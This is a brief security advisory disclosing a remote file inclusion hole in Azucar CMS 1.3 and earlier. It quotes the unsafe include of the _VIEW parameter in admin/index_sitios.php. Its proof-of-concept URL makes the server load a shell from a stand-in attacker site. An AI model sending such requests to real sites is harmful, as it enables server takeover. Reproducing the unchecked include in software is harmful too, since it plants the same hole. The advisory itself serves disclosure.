±------------------------------------------------------------------------------------------
- Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
±------------------------------------------------------------------------------------------
- Affected Software .: Azucar CMS <= 1.3
- Download …: http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
- Description …: "Azucar is a modular content management system designed to be extremely user friendly"
- Class …: Remote File Inclusion
- Risk …: High (Remote File Execution)
- Found By …: nuffsaid <nuffsaid[at]newbslove.us>
±------------------------------------------------------------------------------------------
- Details:
- Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW]
- paramater passed to the script, a remote file can be specified and executed on the server.
- Vulnerable Code:
- admin/index_sitios.php, line(s) 14-15:
- -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
- Proof Of Concept:
- http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php
±------------------------------------------------------------------------------------------